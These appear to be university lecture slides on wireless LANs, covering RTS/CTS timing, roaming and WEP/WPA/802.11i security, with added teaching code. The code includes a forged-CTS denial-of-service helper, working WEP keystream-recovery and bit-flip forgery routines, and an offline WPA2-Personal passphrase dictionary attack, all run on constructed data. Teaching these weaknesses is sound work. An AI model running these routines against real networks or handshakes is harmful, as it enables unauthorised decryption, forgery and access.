
Computer Networks



  1. Computer Networks Marwan Al-Namari Week 10

  2. RTS/CTS time line. RTS: Request-to-Send. CTS: Clear-to-Send. ACK: Acknowledgment. NAV: Network Allocation Vector, a timer every station keeps that records how long the medium is reserved. It is set from the Duration field of an overheard RTS, CTS or data frame (the time the exchange is expected to take, through the final ACK), and a station does not transmit while its NAV is non-zero. This "virtual carrier sense" is what lets a hidden node that hears only the receiver's CTS stay quiet for the whole exchange.
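The timeline on this slide can be reproduced numerically. The following Python is an added example, not part of the original slides: it computes the Duration value each frame of an RTS/CTS/DATA/ACK exchange carries, then simulates which listening stations set their NAV and until when. The timings (SIFS = 10 us, control frames at 1 Mbit/s, 802.11b frame sizes, no preamble, DIFS or backoff) are simplifying assumptions made for the demo, and the station names "A", "B", "C", "D", "E" are constructed. The last function shows the security caveat a practitioner should know: the Duration field is not authenticated, so a forged CTS carrying a large value reserves the medium for everyone in range.

```python
"""Added example (not from the slides): how the 802.11 Duration field of an
RTS/CTS exchange sets the NAV of every station that overhears it.
Timings are simplified 802.11b values (SIFS = 10 us, control frames at
1 Mbit/s, no PLCP preamble/header, no DIFS or backoff)."""

SIFS_US = 10                                  # 802.11b short interframe space
CONTROL_RATE_BPS = 1_000_000                  # rate assumed here for RTS/CTS/ACK
RTS_BYTES, CTS_BYTES, ACK_BYTES = 20, 14, 14  # MAC frame sizes including FCS
NAV_MAX_US = 32767                            # largest value the Duration field can carry


def airtime_us(nbytes: int, rate_bps: int) -> int:
    """Time on air for a frame of nbytes at rate_bps, in whole microseconds."""
    return nbytes * 8 * 1_000_000 // rate_bps


def duration_fields(data_bytes: int, data_rate_bps: int) -> dict:
    """Duration value carried by each frame of one RTS/CTS/DATA/ACK exchange.
    Each frame reserves the medium from its own end until the final ACK ends."""
    t_cts = airtime_us(CTS_BYTES, CONTROL_RATE_BPS)
    t_ack = airtime_us(ACK_BYTES, CONTROL_RATE_BPS)
    t_data = airtime_us(data_bytes, data_rate_bps)
    rts = SIFS_US + t_cts + SIFS_US + t_data + SIFS_US + t_ack
    cts = rts - SIFS_US - t_cts
    data = SIFS_US + t_ack
    return {"RTS": rts, "CTS": cts, "DATA": data, "ACK": 0}


def nav_timeline(data_bytes: int, data_rate_bps: int, hears: dict) -> tuple:
    """Simulate the exchange A -> B and compute, per listening station, when its NAV expires.

    hears maps a station name to the set of transmitters it can overhear
    ("A" is the sender, "B" the receiver); a hidden node typically hears only "B".
    Returns (time the ACK ends, {station: NAV expiry time}), both in microseconds."""
    d = duration_fields(data_bytes, data_rate_bps)
    rts_end = airtime_us(RTS_BYTES, CONTROL_RATE_BPS)
    cts_end = rts_end + SIFS_US + airtime_us(CTS_BYTES, CONTROL_RATE_BPS)
    data_end = cts_end + SIFS_US + airtime_us(data_bytes, data_rate_bps)
    ack_end = data_end + SIFS_US + airtime_us(ACK_BYTES, CONTROL_RATE_BPS)
    frames = [("RTS", "A", rts_end), ("CTS", "B", cts_end),
              ("DATA", "A", data_end), ("ACK", "B", ack_end)]
    nav = {}
    for station, audible in hears.items():
        expiry = 0
        for name, tx, end in frames:
            if tx in audible:
                # 802.11 rule: a station only ever extends its NAV, never shortens it
                expiry = max(expiry, end + d[name])
        nav[station] = expiry
    return ack_end, nav


def forged_cts_expiry(now_us: int, claimed_duration_us: int) -> int:
    """NAV expiry a listener adopts after an unauthenticated CTS ending at now_us.
    The Duration field is not protected, so a forged CTS with the maximum value
    silences every station in range (virtual carrier-sense denial of service)."""
    return now_us + min(claimed_duration_us, NAV_MAX_US)


if __name__ == "__main__":
    ack_end, nav = nav_timeline(1500, 11_000_000, {"C": {"B"}, "D": {"A"}, "E": {"A", "B"}})
    print("durations:", duration_fields(1500, 11_000_000))
    print("ACK ends at", ack_end, "us; NAV expiry per station:", nav)
    print("forged CTS silences neighbours until", forged_cts_expiry(0, 60000), "us")
```

Running it for a 1500-byte frame at 11 Mbit/s shows the point of the slide: the hidden node C (which hears only the CTS) and node D (which hears only the RTS) both end up with a NAV that expires exactly when the ACK finishes, even though they computed it from different frames.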

  3. Association. The process of connecting a station (node) to an access point is called 'Association'. It occurs when a station moves within range, tunes its radio to the channel the access point is set to (found by scanning for beacons or probe responses), completes 802.11 authentication (Open System in practice) and then exchanges an Association Request/Response with the AP. Only an associated station can send data through the AP.

  4. Inter-cell communications. Communication between nodes attached to different access points, via a distribution system or backbone network, is carried by the 802.11 frame format, which contains four MAC address fields (receiver, transmitter, destination and source) so that a frame can be relayed between APs across the distribution system.

  5. Access Points and Roaming. The use of Access Points can extend coverage as far as the wired backbone reaches (more APs, more range). Access Points are typically installed in a false ceiling (higher is better for coverage). APs are connected to the Ethernet backbone and act as a bridge between Ethernet and wireless. In infrastructure mode all communications go through the AP, even between two wireless stations in the same cell.

  6. Roaming

  7. Basic Roaming. As a mobile user roams away from one AP and closer to another, the station's WLAN NIC will automatically "re-associate" with the closer AP to maintain reliable performance.

  8. Broad Roaming Employing Channel Reuse. Access Points can be set to three non-overlapping channels (1, 6 and 11 in the 2.4 GHz band), and these can be reused by non-adjacent cells to provide potentially unlimited coverage.

  9. Load Balancing. Even if a user is stationary, the WLAN NIC may decide to "re-associate" with a different AP because the load on the current AP is too high for optimal performance.

  10. Mobile IP roaming

  11. Seamless Extended Roaming. When the mobile user roams across a router (IP subnet) boundary, re-association alone is not enough, because the station's IP address belongs to the old subnet. With Mobile IP the station registers its new location on the far side of the router with its "Home Agent" on the home subnet, and a "forwarding" (tunnelling) relationship is set up so that traffic addressed to the station's home address is forwarded to it at the new location.

  12. Security Issues. WEP (Wired Equivalent Privacy): can be easily cracked. IEEE 802.1X authentication. Access control lists (MAC address filtering): MAC addresses can be spoofed. Turning off SSID broadcast: the SSID can still be sniffed from probe and association frames. WPA (Wi-Fi Protected Access): better than WEP, available in the latest 802.11g technology. IEEE 802.11i: the standard solution, ratified in 2004, uses stronger encryption and authentication techniques. Additional security options: VPN (Virtual Private Network; the AP could be an end point), VLAN (Virtual LAN), WLAN switches.

  13. WEP problem. Among WEP's numerous flaws are its lack of a message integrity code (the CRC-32 ICV is linear and unkeyed, so an attacker can flip bits in an encrypted frame and fix the ICV without the key) and its insecure data-confidentiality protocol (RC4 keyed with a 24-bit IV prepended to a static shared key, so keystreams repeat and weak-key attacks recover the key from captured traffic). Since decryption can be done passively, an attacker can watch WEP traffic from a distance, remain undetected, and recover the original traffic.
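Both flaws on this slide can be shown concretely. The following Python is an added example, not code from the original slides: it implements WEP encapsulation as the slide describes it (clear-text IV, RC4 over IV plus key, CRC-32 ICV) and then performs the two classic attacks against it, keystream recovery from a repeated IV and a bit-flip forgery that passes the ICV check. The key, the IV, the frame contents and the "known" ARP-like packet are constructed for the demo; the RC4 routine is the standard algorithm written out here so the block runs offline.

```python
"""Added example (not from the slides): a minimal WEP implementation and two of
its classic failures, built from the facts on the slide: RC4 keyed with a 24-bit
IV plus the shared key, and a CRC-32 integrity value that is linear rather than a
keyed MIC. The key, IV and frame contents below are constructed for the demo."""
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream of `length` bytes for `key` (key scheduling + output generation)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext: bytes) -> bytes:
    """WEP's 'integrity' value: plain CRC-32, little-endian, no key involved."""
    return zlib.crc32(plaintext).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """IV || RC4(IV || key) XOR (plaintext || ICV).  The IV travels in clear."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """Return the plaintext, or None if the ICV does not match."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4(iv + key, len(ct)))
    plaintext, tag = body[:-4], body[-4:]
    return plaintext if tag == icv(plaintext) else None


def recover_from_iv_reuse(known_frame: bytes, known_plaintext: bytes, target_frame: bytes) -> bytes:
    """Passive attack: two frames sent under the same IV share a keystream.
    Knowing one plaintext (e.g. a predictable ARP or DHCP packet) yields the
    keystream, which decrypts the other frame without the key."""
    assert known_frame[:3] == target_frame[:3], "attack needs a repeated IV"
    keystream = xor(known_frame[3:], known_plaintext + icv(known_plaintext))
    target_ct = target_frame[3:]
    assert len(keystream) >= len(target_ct), "known plaintext must be at least as long"
    return xor(target_ct, keystream)[:-4]       # drop the recovered ICV


def forge_bitflip(frame: bytes, delta: bytes) -> bytes:
    """Active attack: XOR `delta` into the encrypted plaintext and patch the
    encrypted ICV so the receiver's CRC check still passes, using
    crc32(p ^ d) == crc32(p) ^ crc32(d) ^ crc32(zeros of the same length)."""
    iv, ct = frame[:3], frame[3:]
    assert len(delta) == len(ct) - 4
    icv_delta = (zlib.crc32(delta) ^ zlib.crc32(bytes(len(delta)))).to_bytes(4, "little")
    return iv + xor(ct, delta + icv_delta)


if __name__ == "__main__":
    KEY = bytes.fromhex("0102030405")                   # constructed 40-bit WEP key
    IV = b"\x12\x34\x56"                                 # the 24-bit IV eventually repeats
    known_pt = b"arp who-has 10.0.0.1 tell 10.0.0.2"    # constructed predictable traffic
    secret_pt = b"secret message to bob"
    f_known = wep_encrypt(KEY, IV, known_pt)
    f_secret = wep_encrypt(KEY, IV, secret_pt)           # same IV reused
    print(recover_from_iv_reuse(f_known, known_pt, f_secret))

    order = b"transfer 100 to account 1"
    f_order = wep_encrypt(KEY, IV, order)
    delta = bytearray(len(order))
    delta[9] = ord("1") ^ ord("9")                       # turn "100" into "900"
    print(wep_decrypt(KEY, forge_bitflip(f_order, bytes(delta))))
```

Neither attack touches the key: the first needs only two frames with the same IV (with 2^24 IVs, a busy AP repeats one within hours) and one guessable plaintext; the second needs only the position of the field to change, which is why a keyed MIC, not a CRC, is the minimum requirement for a link-layer cipher.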

  14. IEEE 802.11i IEEE 802.11i, "Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications: Medium Access Control (MAC) Security Enhancement," leverages security technology that has emerged since the original IEEE 802.11 standard was written in the late 1990s. These developments include the Advanced Encryption Standard (AES) and the IEEE 802.1X™ standard for access control. All in all, the IEEE 802.11i amendment is a step forward in wireless security. The amendment adds stronger encryption, authentication, and key management strategies that will make our wireless data and systems more secure.

  15. IEEE 802.11i

  16. More IEEE 802.11i. In IEEE 802.11i, the access point takes the role of the authenticator and the client card the role of supplicant. (In an Independent Basic Service Set [IBSS, ad hoc], each station plays both the supplicant and the authenticator role.) The supplicant authenticates with the authentication server through the authenticator. In IEEE 802.1X the authenticator enforces authentication but does not need to perform it: it relays the authentication traffic (EAP) between the supplicant and the authentication server, and opens its controlled port only after the server reports success. Between the supplicant and the authenticator the protocol is IEEE 802.1X (EAP over LAN, EAPOL). The protocol between the authenticator and the authentication server is defined by neither IEEE 802.1X nor IEEE 802.11i; in practice RADIUS is used, carrying the EAP messages.

  17. WPA. Wi-Fi Protected Access (WPA) is a standards-based security solution from the Wi-Fi Alliance that addresses the vulnerabilities in native WLANs and provides enhanced protection from targeted attacks. WPA was designed to address all WEP vulnerabilities known at the time in the original IEEE 802.11 security implementation and to bring an immediate security solution to WLANs in both enterprise and small office/home office (SOHO) environments, as a subset of the then-unfinished IEEE 802.11i draft. WPA uses the Temporal Key Integrity Protocol (TKIP) for encryption.

  18. WPA2. WPA2 implements the full IEEE 802.11i standard (AES-CCMP as the mandatory cipher) and provides authentication support via IEEE 802.1X and PSK (pre-shared keys). Enterprise Mode: a term given to products tested to be interoperable in both PSK and IEEE 802.1X/EAP modes of authentication. When IEEE 802.1X is used, an authentication, authorization and accounting (AAA) server is required (RADIUS for authentication, key management and centralized management of user credentials). Enterprise Mode is targeted at enterprise environments. Personal Mode: a term given to products tested to be interoperable in the PSK-only mode of authentication. It requires manual configuration of a pre-shared key on the access point and the clients; PSK authenticates users via a password, or identifying code, held on both the client station and the access point, and no authentication server is needed. Because every station shares the same PSK, anyone who knows it can derive the other stations' session keys, and a captured handshake allows offline passphrase guessing, so the passphrase must be long and random. Personal Mode is targeted at SOHO environments.
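The Personal Mode caveat deserves a worked example. The following Python is added here and is not code from the original slides: it derives the WPA/WPA2-Personal PSK from a passphrase and SSID as IEEE 802.11i specifies (PBKDF2-HMAC-SHA1, 4096 iterations, 256-bit output), expands it into the pairwise transient key with the 802.11i PRF, computes the handshake MIC, and then runs the offline dictionary attack that a captured 4-way handshake permits. The MAC addresses, nonces, wordlist and passphrases are constructed for the demo, and the EAPOL-Key body is a constructed stand-in rather than a real frame layout; the PBKDF2 check value for "password"/"IEEE" is the published IEEE 802.11i test vector.

```python
"""Added example (not from the slides): why WPA/WPA2-Personal is only as strong as
its passphrase. The PSK is derived deterministically from passphrase and SSID
(IEEE 802.11i: PBKDF2-HMAC-SHA1, 4096 iterations, 256-bit output), the 4-way
handshake derives the PTK from it, and the MIC on handshake message 2 lets
anyone who sniffed the handshake test passphrase guesses offline. Addresses,
nonces, the EAPOL body and the wordlist below are constructed for the demo;
the EAPOL body is a stand-in, not a real frame layout."""
import hashlib
import hmac


def psk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA-Personal PSK (= PMK) as specified in IEEE 802.11i."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key for CCMP (48 bytes: KCK || KEK || TK).
    aa/spa are the AP and station MAC addresses, anonce/snonce the handshake nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_with_zero_mic: bytes) -> bytes:
    """Key MIC for EAPOL-Key descriptor version 2 (WPA2/AES): HMAC-SHA1 truncated to 16 bytes."""
    return hmac.new(kck, eapol_with_zero_mic, hashlib.sha1).digest()[:16]


def simulate_handshake_capture(passphrase, ssid, aa, spa, anonce, snonce) -> dict:
    """Everything a passive sniffer learns from handshake message 2 (station -> AP)."""
    pmk = psk_from_passphrase(passphrase, ssid)
    kck = derive_ptk(pmk, aa, spa, anonce, snonce)[:16]
    # constructed stand-in for the EAPOL-Key body of message 2 with its MIC field zeroed
    eapol = b"\x02\x03\x00\x75\x02\x01\x0a\x00" + snonce + bytes(16)
    return {"aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol": eapol, "mic": eapol_mic(kck, eapol)}


def dictionary_attack(capture: dict, ssid: str, wordlist):
    """Offline attack: recompute PSK -> PTK -> MIC for each guess; no AP contact needed.
    The cost per guess is the PBKDF2 (8192 HMAC-SHA1 calls); a short or common
    passphrase does not survive this, and the defender never sees the attempts."""
    for guess in wordlist:
        pmk = psk_from_passphrase(guess, ssid)
        kck = derive_ptk(pmk, capture["aa"], capture["spa"],
                         capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return guess
    return None


if __name__ == "__main__":
    print(psk_from_passphrase("password", "IEEE").hex())   # IEEE 802.11i test vector
    aa, spa = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")  # constructed
    anonce, snonce = bytes([0xA1]) * 32, bytes([0x5B]) * 32                   # constructed
    capture = simulate_handshake_capture("correct horse", "HomeNet", aa, spa, anonce, snonce)
    print(dictionary_attack(capture, "HomeNet", ["12345678", "password", "correct horse", "letmein1"]))
```

Two things follow from the code: the SSID acts as the salt, so a PSK precomputed for one common SSID is reusable against every network with that name; and because the attack is entirely offline, rate limiting at the AP does nothing. Only passphrase entropy, or moving to 802.1X/EAP where no shared secret is derived from a password, raises the cost.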

  19. TKIP. The Temporal Key Integrity Protocol (TKIP) is a data-confidentiality protocol designed to improve the security of products that implemented WEP, as a firmware upgrade on existing hardware (it keeps RC4). To get around WEP's limitations, TKIP adds a message integrity code called Michael, which lets devices authenticate that packets come from the claimed source; this matters in a wireless technology where traffic can easily be injected. Michael is a weak MIC, so TKIP pairs it with countermeasures (after two MIC failures within a minute the keys are renewed and traffic is suspended). TKIP also uses a per-packet key mixing function that derives a fresh RC4 key from the temporal key, the transmitter address and a 48-bit packet sequence counter; this defeats the weak-key attacks that let attackers recover WEP keys and decrypt traffic, and the sequence counter also gives replay protection.

  20. WEP and 802.1X. Designed as an authentication standard for wired networks, IEEE 802.1X has a happy side effect when used with WLANs: it gives you per-user, per-session WEP keys ("dynamic WEP"). While WEP's many other problems still exist, 802.1X solves the biggest practical issue: no longer does everyone use the same WEP key that can stick around for months or even years. Instead, every connection authenticated with 802.1X gets its own WEP key, which can be changed as often as the network professional controlling the WLAN desires. The key-recovery attacks on WEP still apply to each session key, so the rotation interval must be short enough that an attacker cannot collect the packets needed to recover it.

  21. IEEE 802.1X use in IEEE 802.11i. IEEE 802.1X provides a framework to authenticate and authorize devices connecting to a network. It prohibits access to the network until such devices pass authentication. It also provides a framework (EAPOL-Key frames) to transmit key information between authenticator and supplicant.

  22. IEEE 802.1X framework

  23. Wireless Switches. Used for management and security control. Different policies can be assigned for each wired segment. Some WLAN switches have built-in APs and authentication servers.

  24. WLAN SWITCH

  25. WLAN switch (before/after). Can have different policies for each wired segment.

  26. abg Segmentation. Could segment by configuring access points so that some users use 802.11b or 802.11g and others use the 802.11a standard, or use multiple access points connected to a WLAN switch; access can also be restricted using security features, and channels must be chosen so they do not interfere.

  27. Extended WLAN. Public access (hot spots), wireless bridging, 3G mobile, mesh radio, broadband wireless (IEEE 802.16, WiMAX).
